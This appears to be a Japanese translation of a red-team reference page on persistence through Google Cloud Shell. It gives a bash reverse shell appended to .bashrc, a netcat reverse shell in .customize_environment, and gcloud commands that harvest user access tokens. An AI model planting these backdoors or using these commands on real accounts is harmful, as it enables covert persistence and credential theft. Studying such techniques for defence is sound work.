Cloud Shell

詳細については、以下をチェックしてください：

永続的なバックドア

Google Cloud Shellは、ブラウザから直接クラウドリソースに対するコマンドラインアクセスを提供し、関連するコストはかかりません。

Google Cloud Shellには、Webコンソールからアクセスするか、**gcloud cloud-shell ssh**を実行してアクセスできます。

このコンソールには、攻撃者にとって興味深い機能がいくつかあります：

1. Google Cloudにアクセス権を持つ任意のGoogleユーザーは、完全に認証されたCloud Shellインスタンスにアクセスできます（サービスアカウントは、組織の所有者であっても可能です）。

2. そのインスタンスは、活動がない場合でも少なくとも120日間はホームディレクトリを維持します。

3. そのインスタンスの活動を監視するための組織の機能はありません。

これは基本的に、攻撃者がユーザーのホームディレクトリにバックドアを設置し、ユーザーが少なくとも120日ごとにGC Shellに接続する限り、バックドアが生き残り、攻撃者は次回実行されるたびにシェルを取得できることを意味します。ただし、次のように実行するだけです：

echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/'$CCSERVER'/443 0>&1 &)' >> $HOME/.bashrc

ホームフォルダには**.customize_environmentという別のファイルがあり、存在する場合はユーザーがクラウドシェルにアクセスするたびに実行されます**（前のテクニックと同様）。ユーザーがクラウドシェルを「頻繁に」使用する限り、前のバックドアまたは次のようなバックドアを挿入して持続性を維持します。

#!/bin/sh
apt-get install netcat -y
nc <LISTENER-ADDR> 443 -e /bin/bash

これは、クラウドシェル（攻撃者として）からgcloud projects listを実行した際の、ブラウザのユーザセッションで表示されるポップアップです：

ただし、ユーザがアクティブにクラウドシェルを使用している場合、ポップアップは表示されず、ユーザのトークンを収集できます。

gcloud auth print-access-token
gcloud auth application-default print-access-token

SSH接続の確立方法

基本的に、以下の3つのAPIコールが使用されます:

• https://content-cloudshell.googleapis.com/v1/users/me/environments/default:addPublicKey [POST] (ローカルで作成した公開鍵を追加する)

• https://content-cloudshell.googleapis.com/v1/users/me/environments/default:start [POST] (インスタンスを起動する)

• https://content-cloudshell.googleapis.com/v1/users/me/environments/default [GET] (Google Cloud ShellのIPを教えてくれる)

しかし、https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key で詳細情報を見つけることができます。

参考文献

• https://89berner.medium.com/persistant-gcp-backdoors-with-googles-cloud-shell-2f75c83096ec

• https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key

• https://securityintelligence.com/posts/attacker-achieve-persistence-google-cloud-platform-cloud-shell/